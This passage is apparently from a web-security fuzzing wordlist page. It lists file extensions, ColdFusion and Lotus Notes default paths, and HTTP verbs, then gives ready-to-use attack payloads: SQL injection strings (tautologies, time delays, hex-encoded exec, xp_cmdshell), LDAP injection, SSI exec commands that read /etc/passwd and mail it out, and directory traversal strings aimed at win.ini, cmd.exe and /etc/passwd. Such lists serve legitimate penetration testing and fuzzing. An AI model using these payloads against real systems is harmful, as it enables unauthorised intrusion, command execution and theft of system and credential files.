.oft<br />
.ofx<br />
.omcs<br />
.omp<br />
.ond<br />
.one<br />
.oo3<br />
.opf<br />
.opx<br />
.or2<br />
.or3<br />
.or4<br />
.or5<br />
.or6<br />
.org<br />
.orx<br />
.otf<br />
.otl<br />
.otln<br />
.ots<br />
.out<br />
.ov2<br />
.ova<br />
.ovf<br />
.p96<br />
.p97<br />
.pab<br />
.paf<br />
.pan<br />
.pbd<br />
.pc<br />
.pcap<br />
.pcb<br />
.pcr<br />
.pd4<br />
.pd5<br />
.pdas<br />
.pdb<br />
.pdd<br />
.pdm<br />
.pds<br />
.pdx<br />
.peb<br />
.pec<br />
.pep<br />
.pex<br />
.pfc<br />
.pfl<br />
.phb<br />
.phm<br />
.pi<br />
.pis<br />
.pjx<br />
.pka<br />
.pkb<br />
.pkh<br />
.pks<br />
.pkt<br />
.pln<br />
.plw<br />
.pmo<br />
.pmr<br />
.pnproj<br />
.pnpt<br />
.pns<br />
.pnt<br />
.pod<br />
.poi<br />
.pos<br />
.postal<br />
.pot<br />
.potm<br />
.potx<br />
.pp2<br />
.ppf<br />
.pps<br />
.ppsx<br />
.ppt<br />
.pptm<br />
.pptx<br />
.prc<br />
.pre<br />
.prf<br />
.prj<br />
.prm<br />
.prs<br />
.psa<br />
.psf<br />
.psm<br />
.pst<br />
.ptb<br />
.ptf<br />
.ptk<br />
.ptm<br />
.ptn<br />
.ptt<br />
.ptz<br />
.pvl<br />
.pwd<br />
.pxj<br />
.pxl<br />
.q07<br />
.q08<br />
.q09<br />
.q3d<br />
.qbw<br />
.qdat<br />
.qdf<br />
.qdfm<br />
.qel<br />
.qfx<br />
.qif<br />
.qpb<br />
.qpf<br />
.qph<br />
.qpm<br />
.qpw<br />
.qrp<br />
.qsd<br />
.ral<br />
.rbt<br />
.rcd<br />
.rcg<br />
.rdb<br />
.rdf<br />
.rdx<br />
.ref<br />
.ret<br />
.rf1<br />
.rfa<br />
.rfo<br />
.rge<br />
.rgn<br />
.rgo<br />
.rmuf<br />
.rnq<br />
.rod<br />
.rog<br />
.roi<br />
.rou<br />
.rpp<br />
.rpt<br />
.rrt<br />
.rsc<br />
.rsd<br />
.rsw<br />
.rte<br />
.rvt<br />
.rwg<br />
.rzb<br />
.s85<br />
.saf<br />
.sam07<br />
.sar<br />
.sav<br />
.sbd<br />
.sbf<br />
.sbq<br />
.sbt<br />
.sca<br />
.scf<br />
.sch<br />
.sdb<br />
.sdc<br />
.sdf<br />
.sdp<br />
.sdq<br />
.sds<br />
.sen<br />
.seo<br />
.seq<br />
.ser<br />
.sgml<br />
.sgn<br />
.shp<br />
.shs<br />
.shx<br />
.skc<br />
.skv<br />
.skx<br />
.sle<br />
.slk<br />
.slp<br />
.snapfireshow<br />
.sonic<br />
.soundpack<br />
.spo<br />
.sps<br />
.spub<br />
.spv<br />
.sq<br />
.sqd<br />
.sql<br />
.sqlite<br />
.sqr<br />
.sta<br />
.stc<br />
.stf<br />
.stk<br />
.stl<br />
.stm<br />
.stp<br />
.str<br />
.stt<br />
.stw<br />
.styk<br />
.stykz<br />
.swk<br />
.sxc<br />
.sxi<br />
.sy3<br />
.t01<br />
.t02<br />
.t03<br />
.t04<br />
.t05<br />
.t06<br />
.t07<br />
.t08<br />
.t09<br />
.t2<br />
.t3001<br />
.tax2008<br />
.tax2009<br />
.tb<br />
.tbk<br />
.tbl<br />
.tcc<br />
.tcx<br />
.tda<br />
.tdl<br />
.tdm<br />
.tdt<br />
.te<br />
.te3<br />
.teacher<br />
.tef<br />
.tet<br />
.tfa<br />
.tfd<br />
.tfrd<br />
.tjp<br />
.tk3<br />
.tkfl<br />
.tmw<br />
.tol<br />
.topc<br />
.tpb<br />
.tps<br />
.tr3<br />
.tra<br />
.trd<br />
.trk<br />
.trs<br />
.trx<br />
.tst<br />
.tsv<br />
.ttk<br />
.txa<br />
.txd<br />
.txf<br />
.uccapilog<br />
.ud<br />
.udb<br />
.udeb<br />
.uds<br />
.ulf<br />
.ulz<br />
.update<br />
.upoi<br />
.usr<br />
.uvf<br />
.uwl<br />
.val<br />
.vbpf1<br />
.vcd<br />
.vce<br />
.vcf<br />
.vcs<br />
.vdb<br />
.vdx<br />
.vfs<br />
.vi<br />
.vip<br />
.vle<br />
.vlg<br />
.vmt<br />
.voi<br />
.vok<br />
.vrd<br />
.vscontent<br />
.vsx<br />
.vtx<br />
.vxml<br />
.w02<br />
.wab<br />
.wb1<br />
.wb2<br />
.wb3<br />
.wdb<br />
.wdq<br />
.wea<br />
.wfd<br />
.wfm<br />
.wgp<br />
.wgt<br />
.windowslivecontact<br />
.wjr<br />
.wk1<br />
.wk2<br />
.wk3<br />
.wk4<br />
.wk5<br />
.wke<br />
.wki<br />
.wks<br />
.wku<br />
.wlmp<br />
.wmdb<br />
.wor<br />
.wpc<br />
.wpf<br />
.wpo<br />
.wq1<br />
.wq2<br />
.wtb<br />
.wtr<br />
.xbk<br />
.xdb<br />
.xdp<br />
.xds<br />
.xef<br />
.xem<br />
.xfd<br />
.xfo<br />
.xft<br />
.xl<br />
.xlc<br />
.xlgc<br />
.xlr<br />
.xls<br />
.xlsb<br />
.xlsm<br />
.xlsx<br />
.xlt<br />
.xltm<br />
.xltx<br />
.xlw<br />
.xmcd<br />
.xml<br />
.xmlper<br />
.xmpz<br />
.xpg<br />
.xpj<br />
.xpm<br />
.xpt<br />
.xrp<br />
.xsl<br />
.xslt<br />
.xsn<br />
.xtm<br />
.xtp<br />
.xxd<br />
.yam<br />
.zap<br />
.zdb<br />
.zdc<br />
.zix<br />
.zmc<br />
.zpl<br />
.{pb<br />
.~hm<br />
</pre><br />
<br />
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===<br />
<pre><br />
# Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
<br />
.0<br />
.000<br />
.7z<br />
.a00<br />
.a01<br />
.a02<br />
.ace<br />
.ain<br />
.alz<br />
.apz<br />
.ar<br />
.arc<br />
.arh<br />
.ari<br />
.arj<br />
.ark<br />
.axx<br />
.b64<br />
.ba<br />
.bh<br />
.boo<br />
.bz<br />
.bz2<br />
.bzip<br />
.bzip2<br />
.c00<br />
.c01<br />
.c02<br />
.car<br />
.cb7<br />
.cbr<br />
.cbt<br />
.cbz<br />
.cp9<br />
.cpgz<br />
.cpt<br />
.dar<br />
.dd<br />
.deb<br />
.dgc<br />
.dist<br />
.ecs<br />
.efw<br />
.epi<br />
.f<br />
.fdp<br />
.gca<br />
.gz<br />
.gzi<br />
.gzip<br />
.ha<br />
.hbc<br />
.hbc2<br />
.hbe<br />
.hki<br />
.hki1<br />
.hki2<br />
.hki3<br />
.hpk<br />
.hyp<br />
.ice<br />
.ipg<br />
.ipk<br />
.ish<br />
.j<br />
.jar.pack<br />
.jgz<br />
.jic<br />
.kgb<br />
.lbr<br />
.lemon<br />
.lha<br />
.lnx<br />
.lqr<br />
.lz<br />
.lzh<br />
.lzm<br />
.lzma<br />
.lzo<br />
.lzx<br />
.md<br />
.mint<br />
.mou<br />
.mpkg<br />
.mzp<br />
.oar<br />
.p7m<br />
.pack.gz<br />
.package<br />
.pae<br />
.pak<br />
.paq6<br />
.paq7<br />
.paq8<br />
.par<br />
.par2<br />
.pbi<br />
.pcv<br />
.pea<br />
.pet<br />
.pf<br />
.pim<br />
.pit<br />
.piz<br />
.pkg<br />
.pup<br />
.puz<br />
.pwa<br />
.qda<br />
.r0<br />
.r00<br />
.r01<br />
.r02<br />
.r03<br />
.r1<br />
.r2<br />
.r30<br />
.rar<br />
.rev<br />
.rk<br />
.rnc<br />
.rp9<br />
.rpm<br />
.rte<br />
.rz<br />
.rzs<br />
.s00<br />
.s01<br />
.s02<br />
.s7z<br />
.sar<br />
.sdc<br />
.sdn<br />
.sea<br />
.sen<br />
.sfs<br />
.sfx<br />
.sh<br />
.shar<br />
.shk<br />
.shr<br />
.sit<br />
.sitx<br />
.spt<br />
.sqx<br />
.sqz<br />
.tar<br />
.tar.gz<br />
.tar.xz<br />
.taz<br />
.tbz<br />
.tbz2<br />
.tg<br />
.tgz<br />
.tlz<br />
.tlzma<br />
.txz<br />
.tz<br />
.uc2<br />
.uha<br />
.vem<br />
.vsi<br />
.wad<br />
.war<br />
.wot<br />
.xef<br />
.xez<br />
.xmcdz<br />
.xpi<br />
.xx<br />
.xz<br />
.y<br />
.yz<br />
.z<br />
.z01<br />
.z02<br />
.z03<br />
.z04<br />
.zap<br />
.zfsendtotarget<br />
.zip<br />
.zipx<br />
.zix<br />
.zoo<br />
.zpi<br />
.zz</pre><br />
<br />
=== Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) ===<br />
<pre><br />
# Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
<br />
.3me<br />
.3pe<br />
.4dl<br />
.8xk<br />
.^^^<br />
.aao<br />
.ab2<br />
.aca<br />
.accdb<br />
.acf<br />
.acg<br />
.agd<br />
.an1<br />
.anme<br />
.arc<br />
.arh<br />
.ast<br />
.att<br />
.aw<br />
.bafl<br />
.bdf<br />
.bfx<br />
.bjo<br />
.bld<br />
.blg<br />
.btf<br />
.btif<br />
.btr<br />
.cct<br />
.cdb<br />
.cdd<br />
.cdf<br />
.cdp<br />
.cdr<br />
.chk<br />
.ckd<br />
.cl2<br />
.cl4<br />
.clb<br />
.clix<br />
.clm<br />
.cmbl<br />
.contact<br />
.cpi<br />
.cpmz<br />
.csv<br />
.cwz<br />
.cxt<br />
.daf<br />
.dat<br />
.data<br />
.db<br />
.dcf<br />
.ddt<br />
.dex<br />
.dif<br />
.dmsk<br />
.dnc<br />
.dpx<br />
.dsd<br />
.dt1<br />
.dt2<br />
.dta<br />
.e00<br />
.ec0<br />
.edf<br />
.eep<br />
.efx<br />
.enc<br />
.enw<br />
.epw<br />
.est<br />
.et<br />
.eta<br />
.ev3<br />
.exif<br />
.exp<br />
.fbl<br />
.fdb<br />
.fid<br />
.fol<br />
.gdb<br />
.gen<br />
.gnp<br />
.gpi<br />
.gpx<br />
.hcp<br />
.hdf<br />
.hmt<br />
.hsk<br />
.htg<br />
.id2<br />
.ii<br />
.img<br />
.ink<br />
.ins<br />
.irr<br />
.irx<br />
.iw<br />
.jdb<br />
.jnt<br />
.job<br />
.jrprint<br />
.kmz<br />
.lbx<br />
.lex<br />
.lgf<br />
.lgl<br />
.lib<br />
.liveupdate<br />
.lnt<br />
.lst<br />
.m<br />
.masseffectprofile<br />
.mat<br />
.mbb<br />
.mdb<br />
.mem<br />
.menc<br />
.met<br />
.mmf<br />
.mng<br />
.mpd<br />
.mpp<br />
.ms10<br />
.muf<br />
.mw<br />
.mwf<br />
.mwx<br />
.nc<br />
.ndx<br />
.nfo<br />
.not<br />
.ns2<br />
.ns3<br />
.ns4<br />
.ntx<br />
.numbers<br />
.ods<br />
.oeaccount<br />
.omcs<br />
.or2<br />
.or3<br />
.or4<br />
.or5<br />
.orx<br />
.out<br />
.ov2<br />
.ovf<br />
.paf<br />
.pbd<br />
.pcr<br />
.pdb<br />
.pdx<br />
.peb<br />
.pec<br />
.pfc<br />
.pis<br />
.pln<br />
.pnpt<br />
.pns<br />
.pnt<br />
.pos<br />
.postal<br />
.pps<br />
.ppsx<br />
.ppt<br />
.pptm<br />
.pptx<br />
.pre<br />
.prf<br />
.psa<br />
.psf<br />
.pst<br />
.ptz<br />
.q07<br />
.q3d<br />
.qbw<br />
.qdat<br />
.qdf<br />
.qfx<br />
.qpf<br />
.qpw<br />
.qsd<br />
.rcd<br />
.rdx<br />
.ref<br />
.rmuf<br />
.roi<br />
.rrt<br />
.rvt<br />
.rwg<br />
.saf<br />
.sam07<br />
.sbd<br />
.sbf<br />
.sbq<br />
.sbt<br />
.sdb<br />
.sdc<br />
.sdf<br />
.sds<br />
.ser<br />
.sgn<br />
.shs<br />
.skc<br />
.slk<br />
.sonic<br />
.soundpack<br />
.spo<br />
.sql<br />
.stf<br />
.stl<br />
.stm<br />
.sy3<br />
.t08<br />
.t09<br />
.t2<br />
.tax2009<br />
.tdl<br />
.tdt<br />
.te<br />
.teacher<br />
.tmw<br />
.tol<br />
.trk<br />
.trs<br />
.trx<br />
.tsv<br />
.uccapilog<br />
.ud<br />
.udeb<br />
.uds<br />
.update<br />
.uwl<br />
.val<br />
.vcf<br />
.vdb<br />
.vfs<br />
.vip<br />
.vle<br />
.vlg<br />
.vxml<br />
.w02<br />
.wab<br />
.wb1<br />
.wb3<br />
.wdq<br />
.wfd<br />
.wfm<br />
.windowslivecontact<br />
.wk1<br />
.wk2<br />
.wk3<br />
.wk4<br />
.wk5<br />
.wke<br />
.wks<br />
.wlmp<br />
.wpc<br />
.wpo<br />
.wq1<br />
.wq2<br />
.wtr<br />
.xbk<br />
.xdb<br />
.xds<br />
.xfd<br />
.xl<br />
.xlgc<br />
.xlr<br />
.xls<br />
.xlsx<br />
.xltm<br />
.xltx<br />
.xml<br />
.xmpz<br />
.xsl<br />
.xsn<br />
.xtm<br />
.xtp<br />
.xxd<br />
.{pb<br />
.~hm<br />
</pre><br />
<br />
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===<br />
<pre><br />
# Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
<br />
CFIDE/Administrator/<br />
CFIDE/Administrator/index.cfm<br />
CFIDE/Administrator/login.cfm<br />
CFIDE/Administrator/Application.cfm<br />
CFIDE/Application.cfm<br />
CFIDE/adminapi/<br />
CFIDE/adminapi/Application.cfm<br />
CFIDE/adminapi/administrator.cfc<br />
CFIDE/adminapi/base.cfc<br />
CFIDE/adminapi/customtags/<br />
CFIDE/adminapi/customtags/l10n.cfm<br />
CFIDE/adminapi/customtags/resources<br />
CFIDE/adminapi/customtags/resources/<br />
CFIDE/adminapi/datasource.cfc<br />
CFIDE/adminapi/debugging.cfc<br />
CFIDE/adminapi/eventgateway.cfc<br />
CFIDE/adminapi/extensions.cfc<br />
CFIDE/adminapi/mail.cfc<br />
CFIDE/adminapi/runtime.cfc<br />
CFIDE/adminapi/security.cfc<br />
CFIDE/adminapi/_datasource/<br />
CFIDE/adminapi/_datasource/formatjdbcurl.cfm<br />
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm<br />
CFIDE/adminapi/_datasource/geturldefaults.cfm<br />
CFIDE/adminapi/_datasource/setdsn.cfm<br />
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm<br />
CFIDE/adminapi/_datasource/setsldatasource.cfm<br />
CFIDE/classes/<br />
CFIDE/classes/cf-j2re-win.cab<br />
CFIDE/classes/cfapplets.jar<br />
CFIDE/classes/images<br />
CFIDE/componentutils/<br />
CFIDE/componentutils/Application.cfm<br />
CFIDE/componentutils/cfcexplorer.cfc<br />
CFIDE/componentutils/cfcexplorer_utils.cfm<br />
CFIDE/componentutils/componentdetail.cfm<br />
CFIDE/componentutils/componentdoc.cfm<br />
CFIDE/componentutils/componentlist.cfm<br />
CFIDE/componentutils/gatewaymenu<br />
CFIDE/componentutils/gatewaymenu/<br />
CFIDE/componentutils/gatewaymenu/menu.cfc<br />
CFIDE/componentutils/gatewaymenu/menunode.cfc<br />
CFIDE/componentutils/login.cfm<br />
CFIDE/componentutils/packagelist.cfm<br />
CFIDE/componentutils/utils.cfc<br />
CFIDE/componentutils/_component_cfcToHTML.cfm<br />
CFIDE/componentutils/_component_cfcToMCDL.cfm?<br />
CFIDE/componentutils/_component_style.cfm<br />
CFIDE/componentutils/_component_utils.cfm<br />
CFIDE/debug/<br />
CFIDE/debug/images/<br />
CFIDE/debug/includes/<br />
CFIDE/images/<br />
CFIDE/images/skins/<br />
CFIDE/install.cfm<br />
CFIDE/installers/<br />
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp<br />
CFIDE/installers/CFReportBuilderInstaller.exe<br />
CFIDE/probe.cfm<br />
CFIDE/scripts/<br />
CFIDE/scripts/css/<br />
CFIDE/scripts/xsl/<br />
CFIDE/wizards/<br />
CFIDE/wizards/common/<br />
CFIDE/wizards/common/utils.cfc</pre><br />
<br />
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31) ===<br />
<pre><br />
# ll HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
<br />
OPTIONS<br />
GET<br />
HEAD<br />
POST<br />
PUT<br />
DELETE<br />
TRACE<br />
CONNECT<br />
PROPFIND<br />
PROPPATCH<br />
MKCOL<br />
COPY<br />
MOVE<br />
LOCK<br />
UNLOCK<br />
VERSION-CONTROL<br />
REPORT<br />
CHECKOUT<br />
CHECKIN<br />
UNCHECKOUT<br />
MKWORKSPACE<br />
UPDATE<br />
LABEL<br />
MERGE<br />
BASELINE-CONTROL<br />
MKACTIVITY<br />
ORDERPATCH<br />
ACL<br />
PATCH<br />
SEARCH<br />
ARBITRARY<br />
</pre><br />
<br />
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111) ===<br />
<pre>/852566C90012664F<br />
/admin4.nsf<br />
/admin5.nsf<br />
/admin.nsf<br />
/agentrunner.nsf<br />
/alog.nsf<br />
/a_domlog.nsf<br />
/bookmark.nsf<br />
/busytime.nsf<br />
/catalog.nsf<br />
/certa.nsf<br />
/certlog.nsf<br />
/certsrv.nsf<br />
/chatlog.nsf<br />
/clbusy.nsf<br />
/cldbdir.nsf<br />
/clusta4.nsf<br />
/collect4.nsf<br />
/da.nsf<br />
/dba4.nsf<br />
/dclf.nsf<br />
/DEASAppDesign.nsf<br />
/DEASLog01.nsf<br />
/DEASLog02.nsf<br />
/DEASLog03.nsf<br />
/DEASLog04.nsf<br />
/DEASLog05.nsf<br />
/DEASLog.nsf<br />
/decsadm.nsf<br />
/decslog.nsf<br />
/DEESAdmin.nsf<br />
/dirassist.nsf<br />
/doladmin.nsf<br />
/domadmin.nsf<br />
/domcfg.nsf<br />
/domguide.nsf<br />
/domlog.nsf<br />
/dspug.nsf<br />
/events4.nsf<br />
/events5.nsf<br />
/events.nsf<br />
/event.nsf<br />
/homepage.nsf<br />
/iNotes/Forms5.nsf/$DefaultNav<br />
/jotter.nsf<br />
/leiadm.nsf<br />
/leilog.nsf<br />
/leivlt.nsf<br />
/log4a.nsf<br />
/log.nsf<br />
/l_domlog.nsf<br />
/mab.nsf<br />
/mail10.box<br />
/mail1.box<br />
/mail2.box<br />
/mail3.box<br />
/mail4.box<br />
/mail5.box<br />
/mail6.box<br />
/mail7.box<br />
/mail8.box<br />
/mail9.box<br />
/mail.box<br />
/msdwda.nsf<br />
/mtatbls.nsf<br />
/mtstore.nsf<br />
/names.nsf<br />
/nntppost.nsf<br />
/nntp/nd000001.nsf<br />
/nntp/nd000002.nsf<br />
/nntp/nd000003.nsf<br />
/ntsync45.nsf<br />
/perweb.nsf<br />
/qpadmin.nsf<br />
/quickplace/quickplace/main.nsf<br />
/reports.nsf<br />
/sample/siregw46.nsf<br />
/schema50.nsf<br />
/setupweb.nsf<br />
/setup.nsf<br />
/smbcfg.nsf<br />
/smconf.nsf<br />
/smency.nsf<br />
/smhelp.nsf<br />
/smmsg.nsf<br />
/smquar.nsf<br />
/smsolar.nsf<br />
/smtime.nsf<br />
/smtpibwq.nsf<br />
/smtpobwq.nsf<br />
/smtp.box<br />
/smtp.nsf<br />
/smvlog.nsf<br />
/srvnam.htm<br />
/statmail.nsf<br />
/statrep.nsf<br />
/stauths.nsf<br />
/stautht.nsf<br />
/stconfig.nsf<br />
/stconf.nsf<br />
/stdnaset.nsf<br />
/stdomino.nsf<br />
/stlog.nsf<br />
/streg.nsf<br />
/stsrc.nsf<br />
/userreg.nsf<br />
/vpuserinfo.nsf<br />
/webadmin.nsf<br />
/web.nsf<br />
/.nsf/../winnt/win.ini<br />
/?Open <br />
</pre><br />
<br />
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126) ===<br />
<pre>Statement<br />
'sqlvuln<br />
'+sqlvuln<br />
sqlvuln;<br />
(sqlvuln)<br />
a' or 1=1--<br />
"a"" or 1=1--"<br />
or a = a<br />
a' or 'a' = 'a<br />
1 or 1=1<br />
a' waitfor delay '0:0:10'--<br />
1 waitfor delay '0:0:10'--<br />
declare @q nvarchar (4000) select @q =<br />
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A<br />
0<br />
031003000270000<br />
declare @s varchar(22) select @s =<br />
0x77616974666F722064656C61792027303A303A31302700 exec(@s)<br />
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)<br />
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e<br />
exec(@s)<br />
a'<br />
?<br />
' or 1=1<br />
‘ or 1=1 --<br />
x' AND userid IS NULL; --<br />
x' AND email IS NULL; --<br />
anything' OR 'x'='x<br />
x' AND 1=(SELECT COUNT(*) FROM tabname); --<br />
x' AND members.email IS NULL; --<br />
x' OR full_name LIKE '%Bob%<br />
23 OR 1=1<br />
'; exec master..xp_cmdshell 'ping 172.10.1.255'--<br />
'<br />
'%20or%20''='<br />
'%20or%20'x'='x<br />
%20or%20x=x<br />
')%20or%20('x'='x<br />
0 or 1=1<br />
' or 0=0 --<br />
" or 0=0 --<br />
or 0=0 --<br />
' or 0=0 #<br />
or 0=0 #"<br />
or 0=0 #<br />
' or 1=1--<br />
" or 1=1--<br />
' or '1'='1'--<br />
' or 1 --'<br />
or 1=1--<br />
or%201=1<br />
or%201=1 --<br />
' or 1=1 or ''='<br />
or 1=1 or ""=<br />
' or a=a--<br />
or a=a<br />
') or ('a'='a<br />
) or (a=a<br />
hi or a=a<br />
hi or 1=1 --"<br />
hi' or 1=1 --<br />
hi' or 'a'='a<br />
hi') or ('a'='a<br />
"hi"") or (""a""=""a"<br />
'hi' or 'x'='x';<br />
@variable<br />
,@variable<br />
PRINT<br />
PRINT @@variable<br />
select<br />
insert<br />
as<br />
or<br />
procedure<br />
limit<br />
order by<br />
asc<br />
desc<br />
delete<br />
update<br />
distinct<br />
having<br />
truncate<br />
replace<br />
like<br />
handler<br />
bfilename<br />
' or username like '%<br />
' or uname like '%<br />
' or userid like '%<br />
' or uid like '%<br />
' or user like '%<br />
exec xp<br />
exec sp<br />
'; exec master..xp_cmdshell<br />
'; exec xp_regread<br />
t'exec master..xp_cmdshell 'nslookup www.google.com'--<br />
--sp_password<br />
\x27UNION SELECT<br />
' UNION SELECT<br />
' UNION ALL SELECT<br />
' or (EXISTS)<br />
' (select top 1<br />
'||UTL_HTTP.REQUEST<br />
1;SELECT%20*<br />
to_timestamp_tz<br />
tz_offset<br />
&lt;&gt;"'%;)(&amp;+<br />
'%20or%201=1<br />
%27%20or%201=1<br />
%20$(sleep%2050)<br />
%20'sleep%2050'<br />
char%4039%41%2b%40SELECT<br />
&amp;apos;%20OR<br />
'sqlattempt1<br />
(sqlattempt2)<br />
|<br />
%7C<br />
*|<br />
%2A%7C<br />
*(|(mail=*))<br />
%2A%28%7C%28mail%3D%2A%29%29<br />
*(|(objectclass=*))<br />
%2A%28%7C%28objectclass%3D%2A%29%29<br />
(<br />
%28<br />
)<br />
%29<br />
&amp;<br />
%26<br />
!<br />
%21<br />
' or 1=1 or ''='<br />
' or ''='<br />
x' or 1=1 or 'x'='y<br />
/<br />
//<br />
//*<br />
*/*<br />
a' or 3=3--<br />
"a"" or 3=3--"<br />
' or 3=3<br />
‘ or 3=3 --<br />
</pre> <br />
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4) ===<br />
<pre>&lt;!--#exec cmd="/bin/ls /" --&gt;&lt;br/&gt;<br />
&lt;!--#exec cmd="cat /etc/passwd" --&gt;&lt;br/&gt;<br />
&lt;!--#exec cmd="find / -name *.* -print" --&gt;&lt;br/&gt;<br />
&lt;!--#exec cmd="mail Foobar@email.de &lt;mailto:Foobar@email.de&gt; &lt; cat /etc/passwd" --&gt;&lt;br/&gt;<br />
</pre> <br />
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132) ===<br />
<pre>Statement<br />
\..\WINDOWS\win.ini<br />
\..\..\WINDOWS\win.ini<br />
\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\..\WINDOWS\win.ini<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
../../../../../../../../../etc/passwd<br />
../../../../../../../../etc/passwd<br />
../../../../../../../etc/passwd<br />
../../../../../../etc/passwd<br />
../../../../../etc/passwd<br />
../../../../etc/passwd<br />
../../../etc/passwd<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
